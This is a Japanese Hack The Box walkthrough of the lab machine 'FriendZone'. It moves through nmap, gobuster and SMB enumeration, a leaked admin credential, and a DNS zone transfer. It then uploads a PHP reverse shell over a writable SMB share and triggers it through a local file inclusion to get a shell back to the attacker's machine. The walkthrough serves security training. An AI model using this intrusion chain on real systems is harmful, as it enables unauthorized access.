はじめに
筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は easy です
easy の中では難易度は高めの machine です
nmap
kali@kali:~$ nmap -sV -sC 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 00:08 EDT
Nmap scan report for 10.10.10.123
Host is up (0.23s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -55m52s, deviation: 1h43m54s, median: 4m06s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2020-06-20T07:13:43+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-20T04:13:42
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.33 seconds80 番
gobuster
kali@kali:~$ gobuster dir -u http://10.10.10.123 -w SecLists/Discovery/Web-Content/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.123
[+] Threads: 40
[+] Wordlist: SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/20 00:18:04 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)kali@kali:~$ gobuster dir -u http://10.10.10.123/wordpress -w SecLists/Discovery/Web-Content/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.123/wordpress
[+] Threads: 40
[+] Wordlist: SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/21 16:39:16 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
===============================================================
2020/06/21 16:46:07 Finished
===============================================================443 番
gobuster
kali@kali:~$ gobuster dir -u https://10.10.10.123 -w SecLists/Discovery/Web-Content/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.123
[+] Threads: 40
[+] Wordlist: SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/20 00:24:32 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/06/20 00:31:12 Finished
===============================================================enum4linux
kali@kali:~$ enum4linux -a 10.10.10.123
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 21 14:27:20 2020
==========================
| Target Information |
==========================
Target ........... 10.10.10.123
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.10.123 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 10.10.10.123 |
============================================
Looking up status of 10.10.10.123
FRIENDZONE <00> - B <ACTIVE> Workstation Service
FRIENDZONE <03> - B <ACTIVE> Messenger Service
FRIENDZONE <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 10.10.10.123 |
=====================================
[+] Server 10.10.10.123 allows sessions using username '', password ''
===========================================
| Getting domain SID for 10.10.10.123 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 10.10.10.123 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.123 from smbclient:
[+] Got OS info for 10.10.10.123 from srvinfo:
FRIENDZONE Wk Sv PrQ Unx NT SNT FriendZone server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 10.10.10.123 |
=============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
=========================================
| Share Enumeration on 10.10.10.123 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.123
//10.10.10.123/print$ Mapping: DENIED, Listing: N/A
//10.10.10.123/Files Mapping: DENIED, Listing: N/A
//10.10.10.123/general Mapping: OK, Listing: OK
//10.10.10.123/Development Mapping: OK, Listing: OK
//10.10.10.123/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
====================================================
| Password Policy Information for 10.10.10.123 |
====================================================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.10.123 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Trying protocol 445/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 10.10.10.123 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 10.10.10.123 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3651157261-4258463691-276428382
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\friend (Local User)
[+] Enumerating users using SID S-1-5-21-3651157261-4258463691-276428382 and logon username '', password ''
S-1-5-21-3651157261-4258463691-276428382-500 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-501 FRIENDZONE\nobody (Local User)
S-1-5-21-3651157261-4258463691-276428382-502 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-503 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-504 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-505 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-506 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-507 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-508 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-509 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-510 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-511 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-512 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-513 FRIENDZONE\None (Domain Group)
S-1-5-21-3651157261-4258463691-276428382-514 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-515 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-516 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-517 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-518 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-519 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-520 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-521 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-522 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-523 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-524 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-525 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-526 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-527 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-528 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-529 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-530 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-531 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-532 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-533 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-534 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-535 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-536 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-537 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-538 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-539 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-540 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-541 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-542 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-543 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-544 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-545 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-546 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-547 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-548 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-549 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-550 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1000 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1001 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1002 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1003 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1004 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1005 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1006 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1007 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1008 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1009 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1010 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1011 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1012 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1013 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1014 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1015 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1016 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1017 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1018 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1019 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1020 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1021 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1022 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1023 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1024 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1025 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1026 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1027 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1028 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1029 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1030 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1031 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1032 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1033 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1034 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1035 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1036 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1037 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1038 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1039 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1040 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1041 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1042 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1043 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1044 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1045 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1046 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1047 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1048 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1049 *unknown*\*unknown* (8)
S-1-5-21-3651157261-4258463691-276428382-1050 *unknown*\*unknown* (8)
=============================================
| Getting printer info for 10.10.10.123 |
=============================================
No printers returned.
enum4linux complete on Sun Jun 21 14:56:12 2020nmap-script smb
kali@kali:~$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 14:35 EDT
Nmap scan report for 10.10.10.123
Host is up (0.26s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)smbclient で色々に繋いでみる
kali@kali:~$ smbclient //10.10.10.123/general
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Wed Jan 23 16:51:02 2019
creds.txt N 57 Tue Oct 9 19:52:42 2018
9221460 blocks of size 1024. 6460296 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit
kali@kali:~$ smbclient //10.10.10.123/Development
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 21 14:40:00 2020
.. D 0 Wed Jan 23 16:51:02 2019
9221460 blocks of size 1024. 6460296 blocks available
smb: \> exit
kali@kali:~$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#なんかの cred が手に入りました
hostname
445 番が not found でなんも情報が出てこないので証明書を見てみると friendzone.red と言う hostname が出てきます
/etc/hosts に 10.10.10.123 friendzone.red を追記してアクセスします。
改めて gobuster
kali@kali:~$ gobuster dir -u https://friendzone.red -w SecLists/Discovery/Web-Content/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://friendzone.red
[+] Threads: 40
[+] Wordlist: SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/21 16:55:39 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/admin (Status: 301)
/js (Status: 301)
/server-status (Status: 403)
===============================================================
2020/06/21 17:02:30 Finished
===============================================================/js/js
Testing some functions !
I'am trying not to break things !
TzNlR0g4QzhnSzE1OTI3NzM5NTl4R2tlRjcwdE15文字列はアクセスのたびに変わっていました。 んー良く分からんので後回しにします
subdomain enumeration
53 番ポートが空いているので subdomain の調査を行います
kali@kali:~$ host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1色々見てみる
出てきたいろんな subdomain も /etc/hosts に書き込みます
(hr.friendzone.red は notfound でした)
uploads.friendzone.red
administrator1.friendzone.red
先ほどの admin:WORKWORKHhallelujah@# を使うとログインに成功します
gobuster
kali@kali:~$ gobuster dir -u https://administrator1.friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://administrator1.friendzone.red/
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/21 19:32:45 Starting gobuster
===============================================================
/login.php (Status: 200)
/images (Status: 301)
/dashboard.php (Status: 200)
/timestamp.php (Status: 200)
/dashboard.php にアクセスしてみます
default の params を入れてみます
腹たつ画像が出てきました
timestamp は gobuster で出ていた timestamp.php を指しているような気がするので LFI を使えそう?
LFI のための upload 場所探し
第一候補は uploads.friendzone.red でしたがどこに upload されているのかわかりませんでした。 う〜んと思っていると、わざわざ uploads.friendzone.red を使わなくても smb で転送で良いじゃんと気がつきます
smb で転送
smb で以下を upload します https://github.com/pentestmonkey/php-reverse-shell
kali@kali:~$ smbclient //10.10.10.123/Development
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (6.9 kb/s) (average 6.9 kb/s)
smb: \> ls
. D 0 Sun Jun 21 20:02:08 2020
.. D 0 Wed Jan 23 16:51:02 2019
php-reverse-shell.php A 5493 Sun Jun 21 20:04:58 2020
9221460 blocks of size 1024. 6373116 blocks available
smb: \> exitこれで以下にアクセスすると…
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell
shell が取れます
kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.123] 58082
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
03:05:57 up 5:44, 0 users, load average: 1.03, 0.65, 0.38
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@FriendZone:/$pspy
www-data@FriendZone:/$ ./tmp/pspy64 -i 1000
./tmp/pspy64 -i 1000
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
